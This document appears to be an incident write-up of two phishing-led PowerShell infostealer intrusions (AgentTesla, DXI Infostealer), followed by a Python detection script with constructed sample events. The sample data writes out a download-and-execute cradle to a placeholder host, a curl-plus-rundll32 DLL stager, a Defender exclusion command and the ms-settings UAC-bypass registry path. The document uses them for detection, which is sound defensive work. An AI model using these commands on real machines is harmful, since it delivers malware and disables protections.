Phishing emails and malicious websites were used to trick users into launching PowerShell-driven malware chains that installed infostealers and stole credentials, clipboard data, and host information. In one case, an EDR alert on a finance user’s device showed msedge.exe spawning powershell.exe, followed by curl.exe, a downloaded DLL, and rundll32.exe; the decoded Base64 command used an IEX and Net.WebClient.DownloadString pattern to retrieve remote code after the user clicked an “Outstanding Invoice — Action Required” lure. The payload was identified as an AgentTesla variant, and responders isolated the host, revoked session tokens, reset credentials, and found two additional recipients of the same phishing email, though only one clicked and SmartScreen blocked the download.
A related intrusion used a phishing site that instructed victims to open PowerShell as administrator and paste an encoded command copied to the clipboard, leading to the download of a ZIP archive and execution of updater.exe, a packed PyInstaller-based DXI Infostealer sample. The malware used a UAC bypass via the ms-settings registry hijack and computerdefaults.exe, added Microsoft Defender exclusions, disabled protections, collected system, network, antivirus, clipboard, screenshot, and browser-related data, and packaged the results with rar.exe before exfiltrating them through the Telegram API as command-and-control. The activity showed a consistent pattern of social engineering, PowerShell abuse, defense evasion, staged payload delivery, and HTTPS or Telegram-based data theft.

Timeline: 6 events, from the most recent confirmed update back to the earliest known activity.
VirusTotal identified the payload as an AgentTesla variant associated with credential and clipboard theft. Responders isolated the host, revoked session tokens, reset credentials, and found two additional recipients of similar emails during a broader hunt, though only one clicked and SmartScreen blocked the download.
Email analysis linked the malicious execution to a phishing message with the subject “Outstanding Invoice — Action Required,” containing a PDF that led the user to click a malicious link. That link launched Microsoft Edge with a custom URL, initiating the observed activity.
An EDR alert identified a suspicious chain on a finance user's machine where msedge.exe spawned powershell.exe, which launched curl.exe, a downloaded DLL, and rundll32.exe. Investigation found a Base64-encoded PowerShell payload that decoded to an IEX/New-Object Net.WebClient DownloadString pattern consistent with remote script retrieval for commodity stealer or RAT activity.
The malware performed host and network discovery, antivirus discovery, clipboard access, Roblox credential theft, and screenshot capture, then archived collected data with rar.exe. It exfiltrated the stolen data through the Telegram API as its command-and-control channel.
Analysis showed the DXI Infostealer used the ms-settings registry hijack with computerdefaults.exe for UAC bypass, added Microsoft Defender exclusions, and disabled multiple Defender protections to evade detection. It also hid itself and later cleaned up created registry keys and self-deleted.
A phishing campaign used a malicious website that told victims to open PowerShell as administrator and paste an encoded command copied to the clipboard. The decoded script downloaded a ZIP from thaisbobetx[.]com, extracted and ran updater.exe, which was analyzed as the DXI Infostealer.
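The timeline above describes two things a SOC can turn into detection logic: the process chain (browser spawning powershell.exe, which spawns curl.exe and rundll32.exe) with a Base64 -EncodedCommand that decodes to an IEX/Net.WebClient.DownloadString cradle, and the later host tampering (the ms-settings handler hijack behind the computerdefaults.exe UAC bypass, plus Defender exclusions). The script below is an added example, not code from the story or from the source article; the event records, PIDs, paths and URLs are constructed and the registry path for the ms-settings hijack (Software\Classes\ms-settings\Shell\Open\command) is the publicly documented location for that technique, not a value taken from the page. The field names are a simplified stand-in for an EDR or Sysmon feed, not any product's real schema.

```python
import base64
import re

# Constructed sample script in the IEX / Net.WebClient.DownloadString cradle shape
# described in the story; the URL is a placeholder, not a real indicator.
SAMPLE_SCRIPT = "IEX (New-Object Net.WebClient).DownloadString('http://stage.example.invalid/a.ps1')"
# powershell.exe -EncodedCommand takes Base64 over UTF-16LE text, so encode it that way.
SAMPLE_ENC = base64.b64encode(SAMPLE_SCRIPT.encode("utf-16le")).decode("ascii")

# Constructed, simplified process-creation and registry events (hypothetical schema).
SAMPLE_EVENTS = [
    {"type": "process", "pid": 100, "ppid": 50, "image": "msedge.exe",
     "cmdline": "msedge.exe --app=http://lure.example.invalid/"},
    {"type": "process", "pid": 101, "ppid": 100, "image": "powershell.exe",
     "cmdline": f"powershell.exe -nop -w hidden -enc {SAMPLE_ENC}"},
    {"type": "process", "pid": 102, "ppid": 101, "image": "curl.exe",
     "cmdline": "curl.exe -o C:\\Users\\Public\\x.dll http://stage.example.invalid/x.dll"},
    {"type": "process", "pid": 103, "ppid": 101, "image": "rundll32.exe",
     "cmdline": "rundll32.exe C:\\Users\\Public\\x.dll,Run"},
    {"type": "registry", "pid": 103,
     "target": r"HKU\S-1-5-21-0-0-0-1001\Software\Classes\ms-settings\Shell\Open\command\DelegateExecute"},
    {"type": "process", "pid": 104, "ppid": 103, "image": "powershell.exe",
     "cmdline": "powershell.exe Add-MpPreference -ExclusionPath C:\\Users\\Public"},
]

BROWSERS = {"msedge.exe", "chrome.exe", "firefox.exe"}
STAGERS = {"curl.exe", "rundll32.exe", "certutil.exe", "mshta.exe"}
CRADLE_PATTERNS = {
    "iex": re.compile(r"\b(iex|invoke-expression)\b", re.I),
    "webclient": re.compile(r"net\.webclient", re.I),
    "downloadstring": re.compile(r"downloadstring", re.I),
}
# Common spellings of the -EncodedCommand switch followed by the Base64 blob.
ENC_FLAG = re.compile(r"(?:^|\s)-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)
MS_SETTINGS_KEY = re.compile(r"\\software\\classes\\ms-settings\\shell\\open\\command", re.I)
DEFENDER_TAMPER = re.compile(r"(add-mppreference\s+-exclusion|set-mppreference\s+-disable)", re.I)


def decode_encoded_command(b64: str) -> str:
    """Decode a powershell -EncodedCommand argument (Base64 of UTF-16LE text)."""
    raw = base64.b64decode(b64 + "=" * (-len(b64) % 4))  # tolerate stripped padding
    return raw.decode("utf-16le", errors="replace")


def cradle_indicators(script: str) -> list[str]:
    """Return which download-cradle markers appear in a decoded script."""
    return [name for name, pat in CRADLE_PATTERNS.items() if pat.search(script)]


def analyze_events(events: list[dict]) -> list[dict]:
    """Run the detections over a list of events and return the findings in event order."""
    by_pid = {e["pid"]: e for e in events if e["type"] == "process"}
    findings = []
    for e in events:
        if e["type"] == "process":
            parent = by_pid.get(e["ppid"])
            # 1. Browser -> PowerShell: a user click turned into script execution.
            if e["image"] == "powershell.exe" and parent and parent["image"] in BROWSERS:
                findings.append({"rule": "browser_spawns_powershell", "pid": e["pid"]})
            # 2. PowerShell -> curl/rundll32: staged payload fetch and DLL execution.
            if e["image"] in STAGERS and parent and parent["image"] == "powershell.exe":
                findings.append({"rule": "powershell_spawns_stager", "pid": e["pid"], "child": e["image"]})
            # 3. Encoded command that decodes to an IEX/WebClient download cradle.
            m = ENC_FLAG.search(e["cmdline"])
            if m:
                decoded = decode_encoded_command(m.group(1))
                hits = cradle_indicators(decoded)
                if hits:
                    findings.append({"rule": "encoded_download_cradle", "pid": e["pid"],
                                     "indicators": hits, "decoded": decoded})
            # 4. Defender exclusion or protection tampering visible on the command line.
            if DEFENDER_TAMPER.search(e["cmdline"]):
                findings.append({"rule": "defender_tamper", "pid": e["pid"]})
        elif e["type"] == "registry" and MS_SETTINGS_KEY.search(e["target"]):
            # 5. ms-settings handler write used by the computerdefaults.exe UAC bypass.
            findings.append({"rule": "ms_settings_uac_bypass_key", "pid": e["pid"]})
    return findings


if __name__ == "__main__":
    for f in analyze_events(SAMPLE_EVENTS):
        print(f)
```

Each finding on its own is noisy in a real estate (curl.exe under PowerShell is common in admin scripts), so the value is in the combination: the same host producing a browser-spawned PowerShell, a decoded cradle, a stager child and an ms-settings write within minutes matches the story's chain closely enough to justify the isolate-and-reset response the timeline describes.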
Source: medium.com (open source).